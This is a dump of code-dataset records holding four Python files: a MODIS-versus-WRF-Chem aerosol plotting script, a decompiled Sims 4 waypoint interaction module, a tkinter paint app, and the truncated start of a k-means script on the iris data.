############### TERRA ######################################\n if type(dat_mod_t_day[n]) == np.ndarray:\n basemod.plot_map_day(output,dat_mod_t_day[n],dat_wrf_t_day[n],lat,lon,serie_time[\"Date\"][n],\"Terra\")\n ############### AQUA ######################################\n if type(dat_mod_a_day[n]) == np.ndarray: \n basemod.plot_map_day(output,dat_mod_a_day[n],dat_wrf_a_day[n],lat,lon,serie_time[\"Date\"][n],\"Aqua\")\n\n\n################ seleccionando por area ################################\narea = list_aod_mod[0].shape[0]*list_aod_mod[0].shape[1]\nporcentaje = [80,70,50,30,20,10] #### porcentajes de numeros no nan\nfor i in range(len(porcentaje)):\n por = porcentaje[i]*(area)/100 ### cantidad de nan aceptables\n dat_mt = []; dat_wt = []; dat_ma = []; dat_wa = []\n dat_wrf_t_day = [];dat_wrf_a_day = [];dat_mod_t_day = [];dat_mod_a_day = []\n for n in range(len(serie_time)):\n day_wrf_t = [];day_wrf_a = [];day_mod_t = [];day_mod_a = [] \n for o in range(len(time_mod_total)):\n ######################## media por dia ################################\n if str(serie_time[\"Date\"][n]) == str(time_mod_total[o][0:10]):\n if int(time_mod_total[o][11:13]) < 12: #### Terra\n day_mod_t.append(list_aod_mod[o])\n day_wrf_t.append(list_aod_wrf[o])\n else:\n day_mod_a.append(list_aod_mod[o]) #### Aqua\n day_wrf_a.append(list_aod_wrf[o])\n if len(day_mod_t) != 0:\n dat_mod_t_day.append(np.nanmean(day_mod_t,axis=0))\n dat_wrf_t_day.append(np.nanmean(day_wrf_t,axis=0))\n else:\n dat_mod_t_day.append(np.nan)\n dat_wrf_t_day.append(np.nan)\n if len(day_mod_a) != 0:\n dat_mod_a_day.append(np.nanmean(day_mod_a,axis=0))\n dat_wrf_a_day.append(np.nanmean(day_wrf_a,axis=0))\n else:\n dat_mod_a_day.append(np.nan)\n dat_wrf_a_day.append(np.nan)\n\n if type(dat_mod_t_day[n]) == np.ndarray:\n if (area - np.isnan(dat_mod_t_day[n]).sum() >= int(por)):\n dat_mt.append(dat_mod_t_day[n])\n if (area - np.isnan(dat_wrf_t_day[n]).sum() >= int(por)):\n dat_wt.append(dat_wrf_t_day[n])\n if type(dat_mod_a_day[n]) == np.ndarray: \n if (area - np.isnan(dat_mod_a_day[n]).sum() >= int(por)):\n dat_ma.append(dat_mod_a_day[n])\n if (area - np.isnan(dat_wrf_a_day[n]).sum() >= int(por)):\n dat_wa.append(dat_wrf_a_day[n])\n\n if (len(dat_mt) != 0 and len(dat_wt) != 0): \n ############### TERRA ######################################\n dat_mod_t = np.nanmean(dat_mt,axis=0)\n dat_wrf_t = np.nanmean(dat_wt,axis=0)\n basemod.plot_map_month(output,dat_mod_t,dat_wrf_t,lat,lon,\"Terra\",porcentaje[i],len(dat_mt))\n if (len(dat_ma) != 0 and len(dat_wa) != 0): \n ############### AQUA ######################################\n dat_mod_a = np.nanmean(dat_ma,axis=0)\n dat_wrf_a = np.nanmean(dat_wa,axis=0)\n basemod.plot_map_month(output,dat_mod_a,dat_wrf_a,lat,lon,\"Aqua\",porcentaje[i],len(dat_ma))\n\n\n######################## media por periodo ################################\nfor n in range(len(dat_mod_t_day)): \n if type(dat_mod_t_day[n]) != np.ndarray:\n del dat_mod_t_day[n]\n del dat_wrf_t_day[n]\nfor n in range(len(dat_mod_a_day)): \n if type(dat_mod_a_day[n]) != np.ndarray:\n del dat_mod_a_day[n]\n del dat_wrf_a_day[n]\ndat_mod_t = np.nanmean(dat_mod_t_day,axis=0)\ndat_wrf_t = np.nanmean(dat_wrf_t_day,axis=0)\nbasemod.plot_map_month(output,dat_mod_t,dat_wrf_t,lat,lon,\"Terra\",\"100\",len(dat_mod_t_day))\n\ndat_mod_a = np.nanmean(dat_mod_a_day,axis=0)\ndat_wrf_a = np.nanmean(dat_wrf_a_day,axis=0)\nbasemod.plot_map_month(output,dat_mod_a,dat_wrf_a,lat,lon,\"Aqua\",\"100\",len(dat_mod_a_day))\n\n\ndiff_t = dat_mod_t - dat_wrf_t\ndiff_a = dat_mod_a - dat_wrf_a\n\nlevels = MaxNLocator(nbins=10).tick_values(0,0.5)\ncmap = cm.get_cmap(\"Blues\",lut=25)\ncmap.set_bad(\"w\")\nnorm = BoundaryNorm(levels, ncolors=cmap.N, clip=True)\n\nfig = plt.figure(figsize=(11, 11))\nrect = fig.patch\nrect.set_facecolor('lightgoldenrodyellow')\nax0 = fig.add_subplot(111, frame_on=False)\nax0.set_xticks([])\nax0.set_yticks([])\nax = fig.add_subplot(111)\nfor axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(3.0)\nm = Basemap(projection='cyl', resolution='h', llcrnrlat=-25.2, urcrnrlat=-21.5,\n llcrnrlon=-49.0, urcrnrlon=-44.3)\nm.drawcoastlines(linewidth=1.5)\nm.drawstates(linewidth=1.5) \nm.drawparallels(np.arange(-90., 120., 1), labels=[1, 0, 0, 0],fontsize=18)\nm.drawmeridians(np.arange(-180., 181., 1), labels=[0, 0, 0, 1],fontsize=18) \ntrend=m.pcolormesh(lon, lat, diff_t, cmap=cmap, norm = norm)\ncbar = m.colorbar(trend, location='right', pad=\"5%\", ticks=levels)\ncbar.set_label('None', fontsize=19)\nax.set_title(\"Difference between Terra Satellite and Model Data\" +\"\\n\" +\n \"over SPMR for June\", fontsize=20)\n\nfig = plt.figure(figsize=(11, 11))\nrect = fig.patch\nrect.set_facecolor('lightgoldenrodyellow')\nax0 = fig.add_subplot(111, frame_on=False)\nax0.set_xticks([])\nax0.set_yticks([])\nax = fig.add_subplot(111)\nfor axis in ['top','bottom','left','right']:\n ax.spines[axis].set_linewidth(3.0)\nm = Basemap(projection='cyl', resolution='h', llcrnrlat=-25.2, urcrnrlat=-21.5,\n llcrnrlon=-49.0, urcrnrlon=-44.3)\nm.drawcoastlines(linewidth=1.5)\nm.drawstates(linewidth=1.5) \nm.drawparallels(np.arange(-90., 120., 1), labels=[1, 0, 0, 0],fontsize=18)\nm.drawmeridians(np.arange(-180., 181., 1), labels=[0, 0, 0, 1],fontsize=18) \ntrend=m.pcolormesh(lon, lat, diff_a, cmap=cmap, norm = norm)\ncbar = m.colorbar(trend, location='right', pad=\"5%\", ticks=levels)\ncbar.set_label('None', fontsize=19)\nax.set_title(\"Difference between Aqua Satellite and Model Data\" +\"\\n\" +\n \"over SPMR for June\", fontsize=20)\nplt.show()\n\n\n", "sub_path": "MODIS/AOD/WRF-Chem_Modis/3.TandA_wrf_compared.py", "file_name": "3.TandA_wrf_compared.py", "file_ext": "py", "file_size_in_byte": 11238, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "xarray.open_dataset", "line_number": 25, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 36, "usage_type": "call"}, {"api_name": "pandas.date_range", "line_number": 36, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 75, "usage_type": "call"}, {"api_name": "xarray.open_dataarray", "line_number": 81, "usage_type": "call"}, {"api_name": "numpy.nansum", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 85, "usage_type": "call"}, {"api_name": "xarray.open_dataarray", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 95, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 103, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 104, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 132, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 135, "usage_type": "attribute"}, {"api_name": "basemap_modis.plot_map_day", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 138, "usage_type": "attribute"}, {"api_name": "basemap_modis.plot_map_day", "line_number": 139, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 162, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 164, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 165, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 167, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 168, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 170, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 171, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 173, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 174, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 178, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 179, "usage_type": "call"}, {"api_name": "numpy.isnan", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 187, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 192, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 193, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.ndarray", "line_number": 202, "usage_type": "attribute"}, {"api_name": "numpy.nanmean", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 206, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.nanmean", "line_number": 210, "usage_type": "call"}, {"api_name": "basemap_modis.plot_map_month", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.ticker.MaxNLocator", "line_number": 217, "usage_type": "call"}, {"api_name": "matplotlib.cm.get_cmap", "line_number": 218, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 218, "usage_type": "name"}, {"api_name": "matplotlib.colors.BoundaryNorm", "line_number": 220, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 222, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 222, "usage_type": "name"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 231, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 236, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 243, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 243, "usage_type": "name"}, {"api_name": "mpl_toolkits.basemap.Basemap", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 256, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 257, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 263, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 263, "usage_type": "name"}]} +{"seq_id": "516536872", "text": "# uncompyle6 version 3.7.4\n# Python bytecode 3.7 (3394)\n# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]\n# Embedded file name: T:\\InGame\\Gameplay\\Scripts\\Server\\interactions\\jog_interaction.py\n# Compiled at: 2020-07-22 05:56:20\n# Size of source mod 2**32: 16676 bytes\nfrom _math import Vector3\nimport itertools, random\nfrom balloon.tunable_balloon import TunableBalloon\nfrom element_utils import do_all\nfrom event_testing.results import TestResult\nfrom interactions import TargetType\nfrom interactions.base.super_interaction import SuperInteraction\nfrom interactions.constraints import Circle, ANYWHERE\nfrom interactions.utils.routing import FollowPath, PlanRoute, get_route_element_for_path\nfrom routing.walkstyle.walkstyle_request import WalkStyleRequest\nfrom routing.waypoints.waypoint_generator_variant import TunableWaypointGeneratorVariant\nfrom routing.waypoints.waypoint_stitching import WaypointStitchingVariant\nfrom sims4 import random\nfrom sims4.tuning.tunable import TunableRange, Tunable, OptionalTunable\nfrom sims4.tuning.tunable_base import GroupNames\nfrom sims4.utils import flexmethod\nimport element_utils, routing, sims4.log\nlogger = sims4.log.Logger('WaypointInteraction')\n\nclass _WaypointGeneratorRallyable:\n\n def __init__(self, waypoint_info):\n self._original_generator = waypoint_info\n\n def get_start_constraint(self):\n return self._original_generator.get_start_constraint()\n\n def get_waypoint_constraints_gen(self, routing_agent, waypoint_count):\n yield from self._original_generator.get_waypoint_constraints_gen(routing_agent, waypoint_count)\n if False:\n yield None\n\n\nclass WaypointInteraction(SuperInteraction):\n INSTANCE_TUNABLES = {'waypoint_constraint':TunableWaypointGeneratorVariant(tuning_group=GroupNames.ROUTING), \n 'waypoint_count':TunableRange(description='\\n The number of waypoints to select, from spawn points in the zone, to\\n visit for a Jog prior to returning to the original location.\\n ',\n tunable_type=int,\n default=2,\n minimum=2,\n tuning_group=GroupNames.ROUTING), \n 'waypoint_walk_style':WalkStyleRequest.TunableFactory(description='\\n The walkstyle to use when routing between waypoints.\\n ',\n tuning_group=GroupNames.ROUTING), \n 'waypoint_stitching':WaypointStitchingVariant(tuning_group=GroupNames.ROUTING), \n 'waypoint_randomize_orientation':Tunable(description='\\n Make Waypoint orientation random. Default is velocity aligned.\\n ',\n tunable_type=bool,\n default=False,\n tuning_group=GroupNames.ROUTING), \n 'waypoint_clear_locomotion_mask':Tunable(description='\\n If enabled, override the locomotion queue mask. This mask controls\\n which Animation Requests and XEvents get blocked during locomotion.\\n By default, the mask blocks everything. If cleared, it blocks\\n nothing. It also lowers the animation track used by locomotion to \\n 9,999 from the default of 10,000. Use with care, ask your GPE.\\n ',\n tunable_type=bool,\n default=False,\n tuning_group=GroupNames.ROUTING), \n 'waypoint_override_agent_radius':OptionalTunable(description='\\n If enabled, use the specified value as the agent radius when\\n generating goals for the waypoints. The agent radius is restored\\n for the actual route.\\n ',\n tunable=TunableRange(description='\\n The value to use as the agent radius when generating goals. \\n ',\n tunable_type=float,\n minimum=0,\n maximum=1.0,\n default=0.123),\n tuning_group=GroupNames.ROUTING), \n 'waypoint_route_fail_balloon':OptionalTunable(description='\\n Tuning for balloon to show when failing to plan a aroute for this waypoint interaction. \\n ',\n tunable=TunableBalloon(locked_args={'balloon_delay':0, \n 'balloon_delay_random_offset':0, \n 'balloon_chance':100}),\n tuning_group=GroupNames.ROUTING)}\n\n def __init__(self, aop, *args, waypoint_generator=None, **kwargs):\n (super().__init__)(aop, *args, **kwargs)\n waypoint_info = kwargs.get('waypoint_info')\n if waypoint_info is not None:\n self._waypoint_generator = _WaypointGeneratorRallyable(waypoint_info)\n else:\n if aop.target is None:\n if self.target_type is TargetType.ACTOR:\n target = self.sim\n else:\n target = aop.target\n elif waypoint_generator is None:\n self._waypoint_generator = self.waypoint_constraint(self.context, target)\n else:\n self._waypoint_generator = waypoint_generator\n self._routing_infos = None\n self._goal_size = 0.0\n self.register_on_finishing_callback(self._clean_up_waypoint_generator)\n\n @classmethod\n def _test(cls, target, context, **interaction_parameters):\n sim = context.sim\n routing_master = sim.routing_master\n if routing_master is not None:\n if sim.parent is not routing_master:\n return TestResult(False, '{} cannot run Waypoint interactions because they are following {}', sim, routing_master)\n return (super()._test)(target, context, **interaction_parameters)\n\n def _get_starting_constraint(self, *args, **kwargs):\n constraint = ANYWHERE\n target = self.target\n if self._waypoint_generator.is_for_vehicle and target is not None and target.vehicle_component is not None:\n constraint = target.is_in_inventory() or Circle((target.position), (target.vehicle_component.minimum_route_distance), routing_surface=(target.routing_surface))\n constraint = constraint.intersect(self._waypoint_generator.get_water_constraint())\n else:\n constraint = self._waypoint_generator.get_start_constraint()\n posture_constraint = self._waypoint_generator.get_posture_constraint()\n if posture_constraint is not None:\n constraint = constraint.intersect(posture_constraint)\n return constraint\n\n @flexmethod\n def _constraint_gen(cls, inst, *args, **kwargs):\n inst_or_cls = inst if inst is not None else cls\n if inst is not None:\n constraint = (inst._get_starting_constraint)(*args, **kwargs)\n yield constraint\n yield from (super(__class__, inst_or_cls)._constraint_gen)(*args, **kwargs)\n\n def cancel(self, *args, **kwargs):\n for sim_primitive in list(self.sim.primitives):\n if isinstance(sim_primitive, FollowPath):\n sim_primitive.detach()\n\n return (super().cancel)(*args, **kwargs)\n\n def _clean_up_waypoint_generator(self, _):\n self._waypoint_generator.clean_up()\n\n def _get_goals_for_constraint(self, constraint, routing_agent):\n goals = []\n handles = constraint.get_connectivity_handles(routing_agent)\n for handle in handles:\n goals.extend(handle.get_goals(always_reject_invalid_goals=True))\n\n return goals\n\n def _show_route_fail_balloon(self):\n balloon_tuning = self.waypoint_route_fail_balloon\n if balloon_tuning is None:\n return\n else:\n return self.is_user_directed or None\n balloon_requests = balloon_tuning(self)\n if balloon_requests:\n chosen_balloon = random.random.choice(balloon_requests)\n if chosen_balloon is not None:\n chosen_balloon.distribute()\n\n def _run_interaction_gen(self, timeline):\n all_sims = self.required_sims()\n if not all_sims:\n return\n self._routing_infos = []\n routing_agent = self.sim\n for sim in all_sims:\n routing_context = sim.routing_context\n routing_agent = sim\n vehicle = None if not sim.posture.is_vehicle else sim.parent\n if vehicle is not None:\n if vehicle.vehicle_component is not None:\n routing_agent = vehicle\n routing_context = vehicle.routing_component.pathplan_context\n self._routing_infos.append((routing_agent, routing_context))\n\n waypoints = []\n default_agent_radius = None\n if self.waypoint_override_agent_radius is not None:\n if routing_agent.routing_component is not None:\n default_agent_radius = routing_agent.routing_component._pathplan_context.agent_radius\n routing_agent.routing_component._pathplan_context.agent_radius = self.waypoint_override_agent_radius\n else:\n try:\n for constraint in self._waypoint_generator.get_waypoint_constraints_gen(routing_agent, self.waypoint_count):\n goals = self._get_goals_for_constraint(constraint, routing_agent)\n if not goals:\n continue\n if self.waypoint_randomize_orientation:\n for goal in goals:\n goal.orientation = sims4.math.angle_to_yaw_quaternion(random.uniform(0.0, sims4.math.TWO_PI))\n\n waypoints.append(goals)\n\n finally:\n if default_agent_radius is not None:\n routing_agent.routing_component._pathplan_context.agent_radius = default_agent_radius\n\n return waypoints or False\n self._goal_size = max((info[0].routing_component.get_routing_context().agent_goal_radius for info in self._routing_infos))\n self._goal_size *= self._goal_size\n if self.staging:\n for route_waypoints in itertools.cycle(self.waypoint_stitching(waypoints, self._waypoint_generator.loops)):\n result = yield from self._do_route_to_constraint_gen(route_waypoints, timeline)\n if not result:\n return result\n\n else:\n for route_waypoints in self.waypoint_stitching(waypoints, self._waypoint_generator.loops):\n result = yield from self._do_route_to_constraint_gen(route_waypoints, timeline)\n\n return result\n return True\n if False:\n yield None\n\n def _do_route_to_constraint_gen(self, waypoints, timeline):\n if self.is_finishing:\n return False\n plan_primitives = []\n for i, routing_info in enumerate(self._routing_infos):\n routing_agent = routing_info[0]\n routing_context = routing_info[1]\n route = routing.Route((routing_agent.routing_location), (waypoints[(-1)]), waypoints=(waypoints[:-1]), routing_context=routing_context)\n plan_primitive = PlanRoute(route, routing_agent, interaction=self)\n result = yield from element_utils.run_child(timeline, plan_primitive)\n if not result:\n self._show_route_fail_balloon()\n return False\n plan_primitive.path.nodes and plan_primitive.path.nodes.plan_success or self._show_route_fail_balloon()\n return False\n plan_primitive.path.blended_orientation = self.waypoint_randomize_orientation\n plan_primitives.append(plan_primitive)\n if i == len(self._routing_infos) - 1:\n continue\n for node in plan_primitive.path.nodes:\n position = Vector3(*node.position)\n for goal in itertools.chain.from_iterable(waypoints):\n if goal.routing_surface_id != node.routing_surface_id:\n continue\n dist_sq = (Vector3(*goal.position) - position).magnitude_2d_squared()\n if dist_sq < self._goal_size:\n goal.cost = routing.get_default_obstacle_cost()\n\n route_primitives = []\n track_override = None\n mask_override = None\n if self.waypoint_clear_locomotion_mask:\n mask_override = 0\n track_override = 9999\n for plan_primitive in plan_primitives:\n sequence = get_route_element_for_path((plan_primitive.sim), (plan_primitive.path), interaction=self,\n force_follow_path=True,\n track_override=track_override,\n mask_override=mask_override)\n walkstyle_request = self.waypoint_walk_style(plan_primitive.sim)\n sequence = walkstyle_request(sequence=sequence)\n route_primitives.append(sequence)\n\n result = yield from element_utils.run_child(timeline, do_all(*route_primitives))\n return result\n if False:\n yield None\n\n @classmethod\n def get_rallyable_aops_gen(cls, target, context, **kwargs):\n key = 'waypoint_info'\n if key not in kwargs:\n waypoint_generator = cls.waypoint_constraint(context, target)\n kwargs[key] = waypoint_generator\n yield from (super().get_rallyable_aops_gen)(target, context, rally_constraint=waypoint_generator.get_start_constraint(), **kwargs)\n if False:\n yield None", "sub_path": "Scripts/simulation/interactions/jog_interaction.py", "file_name": "jog_interaction.py", "file_ext": "py", "file_size_in_byte": 13299, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "sims4.log.Logger", "line_number": 24, "usage_type": "call"}, {"api_name": "sims4.log", "line_number": 24, "usage_type": "attribute"}, {"api_name": "interactions.base.super_interaction.SuperInteraction", "line_number": 40, "usage_type": "name"}, {"api_name": "routing.waypoints.waypoint_generator_variant.TunableWaypointGeneratorVariant", "line_number": 41, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 41, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 41, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.TunableRange", "line_number": 42, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 46, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 46, "usage_type": "name"}, {"api_name": "routing.walkstyle.walkstyle_request.WalkStyleRequest.TunableFactory", "line_number": 47, "usage_type": "call"}, {"api_name": "routing.walkstyle.walkstyle_request.WalkStyleRequest", "line_number": 47, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 48, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 48, "usage_type": "name"}, {"api_name": "routing.waypoints.waypoint_stitching.WaypointStitchingVariant", "line_number": 49, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 49, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 49, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.Tunable", "line_number": 50, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 53, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 53, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.Tunable", "line_number": 54, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 57, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 57, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.OptionalTunable", "line_number": 58, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable.TunableRange", "line_number": 59, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 64, "usage_type": "name"}, {"api_name": "sims4.tuning.tunable.OptionalTunable", "line_number": 65, "usage_type": "call"}, {"api_name": "balloon.tunable_balloon.TunableBalloon", "line_number": 66, "usage_type": "call"}, {"api_name": "sims4.tuning.tunable_base.GroupNames.ROUTING", "line_number": 69, "usage_type": "attribute"}, {"api_name": "sims4.tuning.tunable_base.GroupNames", "line_number": 69, "usage_type": "name"}, {"api_name": "interactions.TargetType.ACTOR", "line_number": 78, "usage_type": "attribute"}, {"api_name": "interactions.TargetType", "line_number": 78, "usage_type": "name"}, {"api_name": "event_testing.results.TestResult", "line_number": 96, "usage_type": "call"}, {"api_name": "interactions.constraints.ANYWHERE", "line_number": 100, "usage_type": "name"}, {"api_name": "interactions.constraints.Circle", "line_number": 103, "usage_type": "call"}, {"api_name": "sims4.utils.flexmethod", "line_number": 112, "usage_type": "name"}, {"api_name": "interactions.utils.routing.FollowPath", "line_number": 122, "usage_type": "argument"}, {"api_name": "sims4.random.random.choice", "line_number": 146, "usage_type": "call"}, {"api_name": "sims4.random.random", "line_number": 146, "usage_type": "attribute"}, {"api_name": "sims4.random", "line_number": 146, "usage_type": "name"}, {"api_name": "sims4.math.angle_to_yaw_quaternion", "line_number": 180, "usage_type": "call"}, {"api_name": "sims4.math", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sims4.random.uniform", "line_number": 180, "usage_type": "call"}, {"api_name": "sims4.random", "line_number": 180, "usage_type": "name"}, {"api_name": "itertools.cycle", "line_number": 192, "usage_type": "call"}, {"api_name": "routing.Route", "line_number": 213, "usage_type": "call"}, {"api_name": "interactions.utils.routing.PlanRoute", "line_number": 214, "usage_type": "call"}, {"api_name": "element_utils.run_child", "line_number": 215, "usage_type": "call"}, {"api_name": "_math.Vector3", "line_number": 226, "usage_type": "call"}, {"api_name": "itertools.chain.from_iterable", "line_number": 227, "usage_type": "call"}, {"api_name": "itertools.chain", "line_number": 227, "usage_type": "attribute"}, {"api_name": "_math.Vector3", "line_number": 230, "usage_type": "call"}, {"api_name": "routing.get_default_obstacle_cost", "line_number": 232, "usage_type": "call"}, {"api_name": "interactions.utils.routing.get_route_element_for_path", "line_number": 241, "usage_type": "call"}, {"api_name": "element_utils.run_child", "line_number": 249, "usage_type": "call"}, {"api_name": "element_utils.do_all", "line_number": 249, "usage_type": "call"}]} +{"seq_id": "138846993", "text": "import tkinter\n\nfrom lib.engine import Engine\nfrom lib.file_processing.converter import Converter\nfrom lib.structure.color import Color\nfrom lib.view.dialog import Dialog\n\n\nclass MyLittlePaint:\n\n def __init__(self):\n self.engine = Engine()\n width = 600\n height = 400\n\n self.win = tkinter.Tk()\n self.win.geometry('%ix%i' % (width, height))\n self.canvas = tkinter.Canvas(\n highlightthickness=0\n )\n self.menu_line = tkinter.Menu()\n\n self.file_submenu = tkinter.Menu(self.menu_line, tearoff=False)\n self.menu_line.add_cascade(label='File', menu=self.file_submenu)\n self.file_submenu.add_command(\n label='New Image',\n command=self.create_new_image\n )\n self.file_submenu.add_command(\n label='Load Image',\n command=self.load_image\n )\n self.win.config(menu=self.menu_line)\n\n def create_new_image(self):\n dialog = Dialog(self.win, 'Create Image',\n 'Width', 'Height', 'BG color')\n self.win.wait_window(dialog.win)\n if dialog.result is None:\n return\n self.engine.create_pixmap(\n int(dialog.result['Width']),\n int(dialog.result['Height']),\n Color.by_name(dialog.result['BG color']),\n )\n\n def load_image(self):\n dialog = Dialog(self.win, 'Load Image', 'File Name')\n self.win.wait_window(dialog.win)\n if dialog.result is None:\n return\n filename = dialog.result['File Name']\n with open(filename, 'rb') as f:\n data = f.read()\n self.engine.set_pixmap(Converter.load(data))\n\n def start(self):\n self.win.mainloop()\n\n\nif __name__ == '__main__':\n app = MyLittlePaint()\n app.start()\n", "sub_path": "MyLittlePaint.py", "file_name": "MyLittlePaint.py", "file_ext": "py", "file_size_in_byte": 1812, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "lib.engine.Engine", "line_number": 12, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 16, "usage_type": "call"}, {"api_name": "tkinter.Canvas", "line_number": 18, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 21, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 23, "usage_type": "call"}, {"api_name": "lib.view.dialog.Dialog", "line_number": 36, "usage_type": "call"}, {"api_name": "lib.structure.color.Color.by_name", "line_number": 44, "usage_type": "call"}, {"api_name": "lib.structure.color.Color", "line_number": 44, "usage_type": "name"}, {"api_name": "lib.view.dialog.Dialog", "line_number": 48, "usage_type": "call"}, {"api_name": "lib.file_processing.converter.Converter.load", "line_number": 55, "usage_type": "call"}, {"api_name": "lib.file_processing.converter.Converter", "line_number": 55, "usage_type": "name"}]} +{"seq_id": "323765700", "text": "import numpy as np\r\nimport pandas as pd\r\nimport random\r\nimport math\r\nfrom sklearn import datasets\r\nimport matplotlib.pyplot as plt\r\n\r\niris = datasets.load_iris()\r\nk = 3 # Numero de clusters\r\n\r\ndata = iris['data']\r\n\r\nmedias = np.zeros((k,2))\r\n#grupos = {'grupo1': [ind1,media1],'grupo2' : [ind2,media2],'grupo3' : [ind3,media3] }\r\ngrupos = {}\r\n\r\ndef dist(x0, y0, x1, y1):\r\n a = (x1 - x0)**2 + (y1 - y0)**2\r\n b = math.sqrt(a)\r\n return b\r\n\r\n#-------------------------------Escolhe os nucleos\r\n\r\nfor i in range(k):\r\n ran = random.randint(0,len(data)-1)\r\n a = \"grupo\"+str(i+1)\r\n grupos[a] = [[],[]]\r\n grupos[a][0].append(ran)\r\n grupos[a][1] = data[ran][0:2]\r\n medias[i] = grupos[a][1]\r\n\r\n# ------------------------------Classifica\r\n \r\nfor j in range(len(data)):\r\n x0 = data[j][0]\r\n y0 = data[j][1]\r\n distancias = np.zeros((k,1))\r\n countIndice = 